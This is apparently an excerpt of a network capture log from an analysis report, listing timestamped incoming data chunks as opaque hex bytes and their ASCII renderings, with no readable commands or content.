2023-10-13 13:21:12 UTC	904	IN	Data Raw: 29 ce dd 03 a2 59 f8 8f 9a 1f db 31 bd e9 85 ce 6d 76 46 40 b7 b8 3f 16 e4 cd f4 a4 9f 01 38 cb a9 01 9b 54 91 b1 2e ff 61 f9 6a 35 40 64 35 95 69 9f 6d 23 1a 8b c4 9c 2e e7 f0 d7 e8 ad c9 1e 3c fa 35 d3 61 f7 68 9a b8 c7 09 3d 9c 42 58 ef 48 29 1e 7d 57 74 c8 53 ba 7b 9a 45 db 0e 3e 6b a5 84 85 41 20 31 07 11 c2 79 e5 95 e1 d4 3a d2 fc 91 a2 2e 94 c6 35 b5 3d 6b ff 43 7b 40 f6 75 84 04 48 af d5 26 f1 bc b2 68 3f 56 3c 7b 08 cd 7c 2f 4f c9 b1 ee 6b f0 e5 54 43 5c c9 a5 b1 0a df 42 20 98 6d ff 8c c5 87 8f ac 0c 44 d1 37 e6 c0 ae 73 b7 26 d7 f9 7b 3a 6c 15 e2 af 50 0a 8f 6a 8b c6 ff 1d 92 b0 6d 47 fb 60 d3 68 5d 84 24 57 3c 85 0f f6 eb 6a 17 ce df 7a 14 32 a5 ee 38 d2 c8 de 37 ce 84 3a 00 25 b4 47 a2 93 91 28 b1 00 05 ed 0c fd 47 58 cd e3 7c 62 27 76 69 cf Data Ascii: )Y1mvF@?8T.aj5@d5im#.<5ah=BXH)}WtS{E>kA 1y:.5=kC{@uH&h?V<{\|/OkTC\B mD7s&{:lPjmG`h]$W<jz287:%G(GX\|b'vi
2023-10-13 13:21:12 UTC	920	IN	Data Raw: 79 07 53 ac c4 38 14 a9 d3 92 80 e9 21 46 25 8d e9 fa dd c3 87 5b 36 38 9e cd ce 5f 51 0f 8a eb d0 4c e2 48 b9 bf 52 ff 00 c0 48 e3 31 a0 08 d2 d5 41 10 dc be a6 19 23 b4 f1 37 ea a2 75 ce 48 94 20 db f3 93 36 34 13 2a b6 9b fb 83 af 1c 05 82 f8 4c 84 a3 86 92 32 3f 24 a3 52 10 53 34 d1 23 49 ff 76 0e 8f ea bd 7b ce c4 9a 9a ec d2 1f 79 fc 5e f1 4d 2e 0c 02 95 47 77 cd 11 76 d7 d8 27 59 e1 e9 a6 36 d0 64 99 21 ab 22 37 88 dd 2d cd d2 d2 1c 29 ad cc ec 90 ef e7 99 09 8f f2 1c cd 0c f5 4a db 9f 80 1c 51 a7 48 4d e5 97 9b fb 51 4b 97 5e 9c 1e 1e 47 27 e2 76 68 6e 14 1e 41 7c 42 98 ea 26 54 2c a0 b0 a6 81 2c 5e 80 23 b6 9e e9 92 f4 7b 58 03 46 4e eb 00 fd f6 f0 b2 be 0d be af 99 cd 41 76 3c 1a 6b 31 98 ca 3a d7 f0 66 6f 93 5a 5e f7 1a 12 7c 5f 68 05 60 69 80 Data Ascii: yS8!F%[68_QLHRH1A#7uH 64*L2?$RS4#Iv{y^M.Gwv'Y6d!"7-)JQHMQK^G'vhnA\|B&T,,^#{XFNAv<k1:foZ^\|_h`i
2023-10-13 13:21:12 UTC	936	IN	Data Raw: 0e ff ae b4 b7 95 54 44 1b a4 b6 af bd ff bc d6 76 fb 53 16 e2 f3 60 00 d5 9a 5a cb 71 aa c3 f0 0c fb 5b 7c d8 05 38 91 b1 4a 3e ff ef a2 27 07 7f e2 3d ca 1f 67 94 79 1f 82 3d 26 f5 e1 c2 8d 24 87 4e be 50 4a 07 f4 67 27 d0 33 38 2c 0f 61 71 df 9b 78 96 18 56 e5 5c 7d 97 a5 11 68 a5 6c 2c 22 ae f6 46 24 92 08 d5 ea d0 b2 81 4d 08 44 07 ee 38 b8 3f e7 34 82 b3 2b 99 c0 b5 cf e7 e9 6e ee 06 dd d6 63 a0 97 d8 40 ba ee 1d 29 f3 03 e6 6f f2 73 f5 dd 4e 11 47 07 ff 8b 42 92 66 a3 58 e3 29 05 87 55 a6 15 e1 ce ee 53 10 5c 8d 51 4d 22 87 fd b0 8c bc 47 1a 02 68 c7 3c 24 53 88 3c fe 91 2c 3d 53 2b a9 4d ab 3c c1 1f 05 5f d0 6d 97 22 75 35 00 81 d6 54 c6 c4 29 1e 40 73 51 f1 e1 e4 37 d9 1f f3 ec 07 90 58 b8 29 a8 5f 4d 73 1f ed 65 d2 65 7a 5e de ed 1a 13 5a 21 0f Data Ascii: TDvS`Zq[\|8J>'=gy=&$NPJg'38,aqxV\}hl,"F$MD8?4+nc@)osNGBfX)US\QM"Gh<$S<,=S+M<_m"u5T)@sQ7X)_Mseez^Z!
2023-10-13 13:21:12 UTC	952	IN	Data Raw: f4 45 f3 39 2c 38 9b 3d 12 3a 39 10 83 30 41 b8 a2 69 1e ac 12 f6 b1 ba b2 8b 6b 36 d8 e6 6c d8 0f f7 18 f0 7b 3f 72 fe 5e f3 38 f0 e5 dc 9b b6 ba 46 38 e9 cc 56 1b 69 67 2f 49 bb 87 8d 40 13 7a 0d 1d 07 0c ff 7f 77 da 72 ff 28 4b 36 c6 b7 61 c9 c2 48 e3 18 78 21 f4 78 60 0b 4d 89 35 cf b1 69 3c cd a4 93 c6 6d 9a 06 bb 7d 55 77 95 b4 ff 8c 00 56 9a 29 8d 76 8d bb 75 49 89 2c c4 77 93 b4 1d 66 ac af 8d c4 d0 0a 42 37 9b b7 36 60 f8 b1 4d f3 95 55 ee eb 4f a5 75 eb 85 36 c8 23 61 53 8b 48 8e 69 f5 3e 1c 3f 5b 63 e0 5a 0a 06 fc 63 c3 c8 fa 6d a2 3e 5c dd 3d 29 4d 32 36 6f 59 cf 3f fb d8 79 e2 65 9c db dc f9 cd e2 d0 a3 da 48 0a a8 c8 2d 2d 2a ff fc 55 29 96 4d 30 17 2f f9 80 b0 0a 27 1a d2 82 c9 25 ac 98 f1 fc c8 aa dc c0 31 4f 83 24 0d 41 92 32 ba b0 19 c7 Data Ascii: E9,8=:90Aik6l{?r^8F8Vig/I@zwr(K6aHx!x`M5i<m}UwV)vuI,wfB76`MUOu6#aSHi>?[cZcm>\=)M26oY?yeH--*U)M0/'%1O$A2
2023-10-13 13:21:12 UTC	968	IN	Data Raw: 84 a5 d8 56 99 32 40 d4 69 2e fc 14 c2 5d d8 fb 6f 9f c9 8d ce 24 e0 ae f9 d5 7f 5c fc 53 92 3c f3 a0 9c e8 c5 b2 80 22 bb 39 49 23 31 6f 90 11 4c 33 e8 37 d7 f4 8e 59 97 12 c8 6d 32 0a 97 c5 c4 c2 fc 47 72 69 b3 2c 3b e5 85 f9 1a c7 cf dd a1 31 89 d0 e5 b3 cf d4 dc 8d e1 c3 d2 d4 d9 47 c1 5b 4a 88 e7 59 e7 fe 02 af 15 40 5e 40 b9 f5 d2 e8 e8 da a0 ac 38 16 01 25 1b d4 41 20 8f d6 9f 46 59 e3 3d 24 3f 82 e1 ce 69 0a 9f ea 95 24 80 5c b9 27 52 73 d9 04 c3 9f dd fd 23 02 70 b0 65 31 a4 f6 8d c1 75 8b 65 c6 50 10 4c c4 5a a3 32 bd a9 12 13 84 ff c5 58 4a 97 0f d4 37 be af ba 2a 7d f0 85 1f 76 ad e6 80 a8 a8 56 6f e2 af 29 b2 ea da 12 51 35 aa 4c 77 66 12 0e f2 16 2f 1c 90 f7 b0 65 6f cf bd 71 49 ff 05 33 9f 5c cb 6b 74 fa 83 6a a4 89 f2 b3 99 17 1a df cf b0 Data Ascii: V2@i.]o$\S<"9I#1oL37Ym2Gri,;1G[JY@^@8%A FY=$?i$\'Rs#pe1uePLZ2XJ7*}vVo)Q5Lwf/eoqI3\ktj
2023-10-13 13:21:12 UTC	984	IN	Data Raw: a0 8f b0 dd cb 5a 74 ed 8a f0 a6 f2 a3 82 64 99 42 a8 45 e3 39 c9 17 97 d5 c7 2f 3f ec e8 53 86 1b 69 7d b4 ca db 67 bc 79 a9 b8 85 b4 77 9b d3 95 26 27 b7 91 0d 23 40 d3 89 c7 42 b0 9a d1 06 76 06 f3 d8 6b df 83 d4 f1 3c c3 c9 c6 31 6f 58 de 98 76 64 9b 0d 4b 20 be e4 90 a0 41 43 56 f2 8d d6 c2 85 42 4c c0 61 8d 51 90 f3 38 c5 d9 39 7d c8 60 b9 0d e8 d4 21 97 2e a0 70 90 8a a7 ed a6 48 fd aa 0d 69 6c 80 97 68 6c f3 58 d0 95 9c e0 a5 2a 27 1b a8 1c 73 b1 06 a5 4d 01 57 55 db bb a0 25 5b 0f be d4 ce 82 9b f3 f8 3c 60 f0 1f 5a 7d 5f 85 c0 72 de c0 32 81 ea 3b 3f 06 79 75 77 22 f3 d5 36 25 52 2b ee 42 27 d0 f7 97 6d b0 6c c6 64 7a 00 08 13 c0 5c 4e 67 d1 74 bf 25 09 0d 31 54 0a 73 d2 f4 b1 2e dc 8d c1 7e e4 28 4d 4a 6a ee 4d 3a 1f 0b a0 9a 44 28 9f ac 2b 0a Data Ascii: ZtdBE9/?Si}gyw&'#@Bvk<1oXvdK ACVBLaQ89}`!.pHilhlX*'sMWU%[<`Z}_r2;?yuw"6%R+B'mldz\Ngt%1Ts.~(MJjM:D(+
2023-10-13 13:21:13 UTC	1000	IN	Data Raw: 1a ba 90 42 10 60 79 e6 2c 82 78 dc c5 23 90 b9 f9 01 61 32 5e 8b 01 77 6d 3e 93 5c e2 d9 b3 e2 4b 67 49 35 f9 93 e0 8b 99 11 62 ed ab cb df de 5d 08 45 4a c0 1b a2 0e 8d 37 ad 04 b0 d9 e7 3e ab 52 69 a3 e8 b1 67 90 39 20 1c f3 01 8c 10 19 50 ad ff 54 52 b4 b4 b6 53 d3 bb 28 c5 c8 47 3d f9 91 03 ab dc 62 3f 3a 93 b4 0f ea 85 33 a8 f9 94 33 6c 82 56 72 2e d3 d9 65 2b 91 62 91 6f 68 62 e8 73 68 35 df 31 5e 4c 6e dc 56 f7 36 bd 7c 1a 21 78 7b 84 3d fd 61 e6 5a a7 dd 85 7f 9f ff 56 48 e9 0f d1 4f a6 48 28 5e 1b fb 12 25 52 10 04 6d 92 04 5f 48 3d a0 82 b1 20 df 54 b0 52 ac 28 30 3d d4 36 d2 96 ff 03 1b 95 b4 1e c4 f9 a3 fd 49 22 54 bf d8 7b f5 bf 08 fd 73 11 25 40 1d f9 b5 55 b8 2e a4 4a ba 65 9c 95 d6 bc 39 15 d4 a0 0a 10 e1 ef 49 0e af 9d 8f c1 53 88 5d 96 Data Ascii: B`y,x#a2^wm>\KgI5b]EJ7>Rig9 PTRS(G=b?:33lVr.e+bohbsh51^LnV6\|!x{=aZVHOH(^%Rm_H= TR(0=6I"T{s%@U.Je9IS]
2023-10-13 13:21:13 UTC	1016	IN	Data Raw: 40 be 79 4b 65 b4 6d dc e0 d3 e7 58 99 68 2a af ea 72 fd 8b ff 38 64 42 85 4b f5 93 d9 d6 1a 40 47 7d 64 c8 0c 76 a4 a5 3c 38 37 01 51 f8 5c 92 95 87 a4 2a 3a 91 17 28 e9 e2 a0 d2 63 9f 6d 77 15 56 ca 38 e5 b4 49 28 2c 8b 65 aa 09 53 0d f2 8e bb 99 34 8c 73 e8 cf 99 bf 6a 0a d0 eb f9 d2 6b 4e 4e 5d eb cf 9b 03 13 64 4b 24 88 ce e8 3e f1 7b a4 17 d4 a2 13 14 34 2c fe 92 f9 73 bf cf b2 00 50 82 23 82 67 ea dc dd a3 a2 2f 54 98 2d 53 0f 3a 27 fb 08 87 76 bf ad 64 62 fe fb 30 6a 2d e2 ce ad 5c 0d 29 11 a6 56 6d 02 e0 35 05 58 c3 d4 13 28 bb 5f d6 7f 3e 0b b6 61 c7 08 bb 82 d8 2b 8a f2 4a b8 95 90 b2 b4 6f 1d db f3 a9 97 0a 1b 3e 82 58 6d 9a 4b b2 8a 1c fc a6 a8 e0 65 f3 07 3b 08 99 72 63 13 65 bb 05 36 c0 de a0 62 44 5d be 52 e4 12 90 1c 02 32 d1 24 ab 21 8c Data Ascii: @yKemXhr8dBK@G}dv<87Q\:(cmwV8I(,eS4sjkNN]dK$>{4,sP#g/T-S:'vdb0j-\)Vm5X(_>a+Jo>XmKe;rce6bD]R2$!
2023-10-13 13:21:13 UTC	1032	IN	Data Raw: d3 0b 09 4c 49 ae ae cf 0f 35 db cd af 9f dc 51 b9 42 c6 30 ab fc f6 b7 9c bf 9e 50 45 fd 0a 16 d0 09 74 9f 73 76 c0 d4 27 60 dd ff 53 9b 40 93 34 19 ef e0 7f d0 1a fd 8f 48 3d 89 ce 0d cb c5 55 ae 5c 07 e4 2c 02 3c 0c 37 36 1c 1c fa 21 bf b1 c7 2d 75 30 c7 57 6b b1 a9 48 02 ba 42 21 1c f7 00 86 31 e8 25 2f 59 70 c0 8d 34 be e6 7a 4d 8c d3 e6 3a 5c bc 0c 7f a7 8a d0 49 2e 52 c7 3e 88 aa c1 d5 d5 83 13 56 d9 26 0d be 74 40 c1 74 46 0a 05 47 97 60 6e d6 8c 98 93 71 2c a2 3c 05 48 de 8d b8 8d aa f0 9d 03 6f 4d 41 a0 9f 17 59 f6 af 51 7e a9 97 69 56 59 c8 b2 9e ca 18 e2 99 a2 7e fc 9a b9 ae e9 70 bb a9 28 3f c4 67 d4 2e a9 74 7a 12 88 29 8e 76 47 32 29 89 a3 c5 35 2c 1d 4f df 05 93 d2 44 38 63 fc 32 e6 ef 7d bc 69 bd 7a 6c ea 0d ca db b5 44 ab c7 5a 5b eb 67 Data Ascii: LI5QB0PEtsv'`S@4H=U\,<76!-u0WkHB!1%/Yp4zM:\I.R>V&t@tFG`nq,<HoMAYQ~iVY~p(?g.tz)vG2)5,OD8c2}izlDZ[g
2023-10-13 13:21:13 UTC	1048	IN	Data Raw: dd 8b 36 18 4e 0b 38 54 6e 21 37 72 73 3a eb 54 44 1a 60 b4 5e 81 e5 1a 3c 44 31 a1 46 44 aa 9a d2 51 85 dd 08 d4 6e 41 14 00 7d 22 45 d4 38 99 1b 69 3e 9d 8f 41 81 3e 7e e7 dd 5f 5a 0c 38 2e fc 0a b3 3d fb d1 d1 53 cd 6c 4c 8b 6e 91 6c 06 5f 9e fb 54 1c f3 c3 db 9e 72 69 5d 96 ef 44 60 32 c8 bc 00 f6 07 0d 60 fb 8f 0c a6 0b 79 a1 28 2c 4e 2d 01 a0 b9 39 bb d8 de 42 a5 9a 6a 16 6c 0a bf e5 c2 cd 9a 6a 6a 51 20 09 b0 6a 4f f3 e8 b2 06 e3 60 ac 71 d9 37 27 41 c7 1a 98 5d 3c 82 55 41 39 90 07 dd 7e 6d 92 6b 3f da 76 8c ee c7 c0 3e 87 f6 5c 62 32 e6 d5 60 7a 7e 63 e1 23 df 71 ed 14 d1 ce 87 0a 01 0e 54 de cc 99 cc 81 1e f5 a9 62 90 c6 92 66 02 53 b0 85 34 67 30 be 3d 69 49 22 e2 b6 bf 21 72 83 b4 45 88 b6 f3 e7 a2 7a 1b 25 4a d4 4e 40 b1 de 3c e2 7b cf a0 d1 Data Ascii: 6N8Tn!7rs:TD`^<D1FDQnA}"E8i>A>~_Z8.=SlLnl_Tri]D`2`y(,N-9BjljjQ jO`q7'A]<UA9~mk?v>\b2`z~c#qTbfS4g0=iI"!rEz%JN@<{
2023-10-13 13:21:13 UTC	1064	IN	Data Raw: 8c ea d1 2e a7 16 64 2c 09 80 72 bf e3 b7 8f 90 a3 dd 03 5f ad 86 b0 07 ec 55 78 70 8d 1e 0a f5 8a 07 c8 6a 35 64 fd 16 55 15 f4 1f 5e 73 6e 12 30 dc 6e ff 45 0e 53 e2 e1 05 ac 16 d3 50 3e a4 ce e5 d4 4b da b4 06 99 c5 fc 70 fb 9e 5c 69 5a d3 c1 d8 3a e3 f2 d7 62 d3 aa 94 ad 99 9c 89 03 e5 1e a8 65 3a da ae a7 5c 1d ff d3 79 be 55 00 a6 53 e1 e4 64 86 64 5b 83 f4 f8 77 04 4e 6f 2d be 8b 72 a8 5b 27 b2 a8 41 34 e6 a0 1e 77 22 89 83 f7 7c ae 2a e9 3a ef 28 02 94 cf 29 fa f6 8a a6 6b b3 5f d9 cc 5f 9c b6 6f c9 a9 80 40 a7 94 ce 39 5f d0 0e 6d ff 8c 4c 5d 26 fc e6 8b d3 e2 33 e1 7b b7 ed 9f b8 91 b9 77 69 05 1d 48 77 a3 12 ee b7 45 7b 75 7b f7 f3 78 47 15 b0 81 2a 03 4f ce c3 35 f3 03 73 36 dc 76 1d 6c 35 5e 8d c7 4f b3 04 1b 8b a3 8c d6 24 ea a7 5f 7d 4d e9 Data Ascii: .d,r_Uxpj5dU^sn0nESP>Kp\iZ:be:\yUSdd[wNo-r['A4w"\|:()k__o@9_mL]&3{wiHwE{u{xGO5s6vl5^O$_}M
2023-10-13 13:21:13 UTC	1080	IN	Data Raw: d1 d1 65 9a 73 49 09 00 40 b7 ef e4 f3 ec 52 b3 71 1a b3 a2 ac 9c 4c 50 15 55 8e 92 ca ba fc ad 65 ce e5 eb 3a 2a 7a b2 cd dc 2d c4 5b 46 39 07 36 5c 6f aa 9d a1 55 5b 56 81 8c 05 0e 64 b0 8b 4d 4d 79 75 32 81 53 fc 3d 2a 78 d8 f5 91 7d 12 e7 9b af e9 55 00 32 d1 c3 d3 3f ac 83 92 1e e3 50 dc ab 0b 6d 67 c5 22 c8 20 cf 68 ac 58 e9 c0 d3 da de 68 d4 dd be 09 f5 80 44 b2 66 c7 0a ac 35 59 3b 60 51 f2 02 e4 cb 44 53 5e 4e 27 34 a7 b9 a6 96 5d 42 ff 0f 20 ee 21 3d 6a 7d ea 61 b2 a5 67 1d e5 18 7a 71 56 78 01 dc ed 8e 36 b5 fb b7 75 e9 14 5e 5e 2a 8c 67 be 69 39 80 fb 96 75 71 cd 58 cf e4 df 0f 15 08 3b 10 b8 f5 ad 8f a8 90 11 69 de d8 6b 03 cb a3 26 73 4d 1f 89 8a d2 74 15 e9 20 34 ec a7 d2 ed d6 e2 f6 2e 27 25 0f 28 56 bd 20 6a ba 7c b9 4b 6c 37 92 8f 13 15 Data Ascii: esI@RqLPUe:z-[F96\oU[VdMMyu2S=x}U2?Pmg" hXhDf5Y;`QDS^N'4]B !=j}agzqVx6u^^*gi9uqX;ik&sMt 4.'%(V j\|Kl7
2023-10-13 13:21:13 UTC	1096	IN	Data Raw: 0d 5a ab 3b 30 d0 4e 67 eb 83 5e df 1a f8 f2 21 0b 0e e0 f7 9c 16 f4 29 60 03 de 12 35 7f 02 c6 ad b5 1c 2c b0 78 ab b1 42 9d 06 6d a1 da c8 9f ac 6a ef a2 2f 90 8a 84 a5 ce 44 31 13 8f 64 70 c0 2d 39 a8 8e 85 9c 7c 7f bd 9a 9d 88 30 bd c9 5f 3c 77 28 c5 ee eb cb 85 d5 39 a7 7d d8 91 3b 35 00 79 eb a4 3a 63 33 6a d6 0e 42 c3 c8 b7 92 3e 18 0b ad 21 fd cc 02 66 f4 e5 31 19 d6 e0 d6 8e 73 60 73 cf 8f ce 38 cd e0 4f 58 21 2f 07 f7 f9 9b 27 9a f4 5d 9b 83 e0 dd 20 e5 a7 f8 ac 5b 33 4e 72 b5 3f 0a 75 b7 60 25 92 97 36 27 20 10 c3 0f 8e eb 33 fd 22 3f db 23 31 28 dd 6c 4b fb ef 59 80 73 cf cd 75 c7 2c 09 fe 80 7c 58 ac 11 70 4c 83 85 81 1a 03 8e e9 38 48 04 60 45 fb 81 81 b2 66 83 7a 58 7f 55 90 24 04 0f 12 81 50 f0 11 b2 65 34 44 e2 12 04 20 d9 32 2d aa f5 88 Data Ascii: Z;0Ng^!)`5,xBmj/D1dp-9\|0_<w(9};5y:c3jB>!f1s`s8OX!/'] [3Nr?u`%6' 3"?#1(lKYsu,\|XpL8H`EfzXU$Pe4D 2-
2023-10-13 13:21:13 UTC	1112	IN	Data Raw: 17 49 55 ab dc c3 c6 7a 8e 8e 4c c5 0a b3 49 f4 94 7b 23 5f 5a 89 d1 3e af b7 3b a1 f6 bc 59 04 a1 82 e2 87 c9 45 ca 23 42 2b 29 22 be 87 fa 52 1d 28 ad 7e 16 d9 27 9c 14 c8 d8 4a 36 ad ff 57 58 d7 86 15 98 c2 16 40 39 78 0d 96 71 83 b0 e3 37 5e af 3d 80 b9 be 6c 50 0c 01 53 d3 03 57 a6 0a 67 c6 11 e2 68 e2 00 95 89 18 b5 0b c2 01 fa 0a 31 4b b4 3f 41 5c fb 57 2c 09 cc 82 f6 5d 31 96 9d c6 49 13 38 99 81 e8 ad 94 75 ca 39 e6 ba 3b 7a 66 9f c7 4a 00 5c 8e 08 c3 77 14 1f ce 6d f2 04 d7 a0 e3 0d f0 9c 1b 1f 0a e0 a3 05 b6 65 57 34 92 e0 f8 7e 23 79 9b 5a 45 6f f4 b0 19 58 4b c1 cc 10 fe 27 be ef 38 55 b2 6f b7 21 e8 b4 be 3d af d2 aa 76 24 8e f3 01 9e 17 84 a6 17 ca 14 d2 22 8a ec 00 ef 26 65 3f 5d 18 8e 30 da a4 ae aa 2b 5b d7 d1 f6 2a e5 ed ba 2f ac 58 5a Data Ascii: IUzLI{#_Z>;YE#B+)"R(~'J6WX@9xq7^=lPSWgh1K?A\W,]1I8u9;zfJ\wmeW4~#yZEoXK'8Uo!=v$"&e?]0+[*/XZ
2023-10-13 13:21:13 UTC	1128	IN	Data Raw: 46 5c 44 c5 06 aa c0 93 71 71 66 60 35 c7 04 2e 76 40 f5 98 b5 84 53 fc ca ae 9f 7a 90 5a 89 de 13 63 70 a2 e8 13 7b a4 57 57 4d d0 fe 5b 12 bc 56 ba 0c 5b b1 99 a0 82 e8 7f b0 d8 a2 90 04 de 49 ea 73 4b de 6c 8f ec 76 45 ce 00 9a ed 6d 9b dd 76 61 da 9f 12 27 be 03 fc 7a 5c a6 4b 2f e5 cf 54 46 15 e4 09 77 ec 04 48 c3 7f 45 76 40 de 8c 81 4a db a4 b7 da 60 2a 64 97 77 5b d4 84 a4 ed ad cb d0 60 c3 3b 11 04 a7 bb 34 42 b0 58 76 52 07 12 a5 6f 8f 44 27 d2 34 e9 45 fc e2 8e 10 3a 8c a9 54 90 59 2e 6c 36 09 8d 5e 45 04 36 1f b0 28 da a9 43 78 5a d2 4d c0 d6 e6 11 78 13 0a 8f 5c 56 29 c7 70 c8 a0 38 ef 65 d5 e8 cf 63 6e f4 1a 9f 5c 57 ab 73 6f 46 ca 38 3e 8f 0f 6c 0b aa 8e 7f 7f 5d 3a 14 c9 65 fb cc 61 ee ad a7 b9 b6 e3 68 77 5a be f5 fe 74 b3 3f 7e b7 f1 06 Data Ascii: F\Dqqf`5.v@SzZcp{WWM[V[IsKlvEmva'z\K/TFwHEv@J`*dw[`;4BXvRoD'4E:TY.l6^E6(CxZMx\V)p8ecn\WsoF8>l]:eahwZt?~
2023-10-13 13:21:13 UTC	1144	IN	Data Raw: 88 eb 35 6f 13 72 24 27 0e 07 ea d5 66 29 76 53 5a b6 ef c4 3d 8e d3 47 b7 6f cc 36 40 04 81 11 0a 0d 04 9b 62 7f 57 c9 11 f4 8b 7f 5a bd 47 23 50 ce de 8a ac 68 a1 43 d0 d3 cd cf 5b 1e 1a 00 83 95 d9 70 98 08 b7 7a 7e 2b 0f fb f9 6d 45 55 dc 92 3d ab 14 28 6e 3b 90 66 84 33 b9 8f f9 15 62 2c b8 20 5f 41 84 86 0c a4 ca e9 fd 30 bd a1 fd 22 41 2a bd 1c 4b fc f1 83 24 3e 02 85 27 61 57 d8 42 6f f0 89 d1 ed 64 c5 11 0a a0 10 5e b8 14 bf aa 46 ce 3c 77 d2 ff 0a 88 fb d0 7d 62 b1 a6 bf 93 0b a7 f7 79 ad f1 39 dd 18 2e 6d e5 64 57 d3 b1 2a 1f da ca 61 3e ee fd 00 4c 7f cc 30 13 ad d8 6e cc 29 d2 34 6d 12 e5 7d c8 97 6e 0d 08 89 c5 bc 8b ab 43 b4 23 87 0b b2 dd a5 22 d9 83 51 c6 c8 ec 7f 17 ed 50 cb f7 17 d4 ac 36 da 0e ac 67 f5 d5 18 cd 2a cf 03 66 91 ab 12 5e Data Ascii: 5or$'f)vSZ=Go6@bWZG#PhC[pz~+mEU=(n;f3b, _A0"AK$>'aWBod^F<w}by9.mdWa>L0n)4m}nC#"QP6g*f^
2023-10-13 13:21:13 UTC	1160	IN	Data Raw: fe b5 72 c7 e3 96 7c fb 64 9b a9 a5 7b f5 2d fa 20 ba 9c 2b 16 d4 36 c0 ad 39 c8 a7 c7 47 38 36 57 18 ee 8a 00 e1 cf d8 05 86 b0 b3 0e 72 8c 16 ed 65 4f 69 e1 72 49 34 62 79 6e 8b 53 7c f4 ab 1f 84 2a 0b 28 d0 ee 53 1d e4 d5 50 1b c3 e2 fd 7d 54 95 12 eb 66 5e 33 c8 5d 68 b0 4b 88 3d 03 e0 0e 08 c4 e2 e3 e2 3b 78 4c 62 4a c8 a7 c2 ac f6 88 ab d0 d4 1d f1 35 10 c6 f3 83 f1 8c 7e 0e 9e c4 0c 7d 5e 39 71 a2 19 ab 39 b4 29 54 2b 4e 86 79 81 d9 e0 0b 23 53 e4 58 2f 03 95 e1 4c 15 1e 18 31 33 5a ce fb 07 5a 6a f8 bf f7 5d 95 c8 3d f2 06 2a e3 f7 17 58 5c 1b 5c 53 23 8b 99 c4 99 9c 4c 6a 92 e4 03 7e e9 ae 31 a8 aa d1 87 e3 6e d7 c8 df e5 e9 1b ff 0a 74 07 40 cf 1e e0 3b c2 fa fd 68 ca be f8 3b ae 25 bc 63 55 f7 3b 13 fa 95 94 9b ec d0 3b d9 10 9e 06 e9 af 38 0b Data Ascii: r\|d{- +69G86WreOirI4bynS\|(SP}Tf^3]hK=;xLbJ5~}^9q9)T+Ny#SX/L13ZZj]=X\\S#Lj~1nt@;h;%cU;;8
2023-10-13 13:21:13 UTC	1176	IN	Data Raw: 05 68 31 bd ff 0a dc e2 91 f0 f0 2f b2 93 ff 76 bf c6 c4 bf 1f 0f 4a 0e 0a ab 2f 27 d3 a7 e6 06 0d bb 13 5d 4d 2f d1 96 0a c8 ff e1 00 76 63 3c 53 55 35 af c2 14 32 81 98 8c 2b 78 cf a4 fe ef 46 4d 07 b3 1e 79 cd ef 36 50 4b fb 30 e7 16 a8 63 f7 6a 32 af 7f 17 09 f5 34 b8 85 be 6b 7a 2f c6 89 13 f8 0b a2 94 21 f2 17 63 20 86 4e 4c fc 22 83 08 d1 38 58 b0 9e a0 d1 42 1d 33 29 c2 0e f1 52 3f 79 34 f0 d5 e7 de ac 36 be c5 c8 9d 39 dc e3 26 89 4c 60 fe 88 83 e1 a9 a1 2b cd 5d 20 be ba 65 c2 58 57 a6 1f 3f b6 4f da 99 0a d0 2c 9f fa 25 f9 89 68 e8 c0 9d 16 20 e9 56 6c 96 02 3b 89 8a 39 c6 8f 36 44 4b a2 41 89 12 5e 01 6d 21 9a 90 36 85 46 8e c2 f6 89 38 29 29 9a 8d fd 23 9e 9a b3 3c 7a 4b 44 cd af 94 dd 19 cd 04 2e b4 2b 35 ec b7 16 18 81 c9 4f c1 b4 9e f6 e9 Data Ascii: h1/vJ/']M/vc<SU52+xFMy6PK0cj24kz/!c NL"8XB3)R?y469&L`+] eXW?O,%h Vl;96DKA^m!6F8))#<zKD.+5O
2023-10-13 13:21:13 UTC	1192	IN	Data Raw: 0e 7c 57 d3 10 0e 9e c8 a5 7f 17 13 27 a3 85 0f 2b 6a 0b cb e5 13 17 22 bb 7d f2 fb 5a 35 70 ab 06 1b ca ec 7d 0d 55 87 49 20 65 43 92 6a 4d 6e 7c 5d d0 3f 27 29 bb 25 b8 11 1f 33 f6 7f 01 7b 5b 4c bb 5a 2b 44 04 83 6d d0 a9 46 62 3a d4 6b ad 33 1a 3b 12 d2 b5 36 3f be f2 2c 52 e9 5c 38 72 8e 31 9a d2 8d 6b 8f 99 ad 4d f1 55 a4 bb d0 60 3f bf 2b 51 09 c7 cb d7 42 0e 39 85 b3 8d 77 f4 27 58 06 f5 d1 dd 24 4d 75 c0 d9 b3 6b a8 59 f7 b4 84 fb 2c 82 c6 0b 2a 0b 1f aa 52 f9 dd 4f 60 71 f9 57 32 ca 8b f7 09 c6 14 8b d3 02 b3 d0 7d 13 d9 f9 4c c4 a7 09 e1 9d af 6c 19 ae 35 41 fb c0 61 92 de e3 59 2c 72 74 2f 01 1f 35 0f e0 f4 f3 39 23 ec 8c d9 3d 6b 23 82 19 0b f1 68 8c 3c 78 06 73 55 1a 14 4c 6c 89 46 ed b6 e0 49 75 18 94 ec 88 3c df 59 27 bd 4a 8c 51 e9 c9 d4 Data Ascii: \|W'+j"}Z5p}UI eCjMn\|]?')%3{[LZ+DmFb:k3;6?,R\8r1kMU`?+QB9w'X$MukY,*RO`qW2}Ll5AaY,rt/59#=k#h<xsULlFIu<Y'JQ
2023-10-13 13:21:13 UTC	1208	IN	Data Raw: e9 fd 2b 05 9b 2c 0d f3 ae 7a 35 3d 7c 90 f4 95 7f 83 ec 59 af 86 d4 85 8b 54 f0 87 ea d3 db c4 4a 58 47 32 5e 05 c3 47 60 c3 50 e4 ff 30 c2 a6 91 08 36 b3 f1 7a 67 41 e6 44 ca 15 81 33 6d 2a e1 62 43 fa 43 f7 51 7a 56 64 89 f1 e4 8e da bb 72 4c be f0 c1 bb 58 02 d4 7a 6b 39 ad 6c a6 08 cc 2e 41 d7 ae 34 8f ac 4c 83 a7 67 49 ad ae ec 64 48 26 0b c7 56 ba 67 f9 1f ce 8e d2 eb 6c 06 fb ac 6f 2e 90 ce 93 40 5a 24 57 34 16 60 12 fb 6e e9 7c 42 a0 64 f8 26 d7 1e 67 74 a9 32 5e f2 7e 55 af af 4e af 51 50 06 a5 27 a1 03 5d f1 7a 6e 09 65 76 5d 6a 07 69 75 14 0e e8 f4 31 34 d7 15 97 32 3c 96 6f 49 b7 37 38 75 dc 96 79 ea 6c e6 72 a0 45 a6 52 80 3b ab 02 dd dc 5e 3b 4d 30 c3 4f 5b 99 ef dd 3e f3 ae 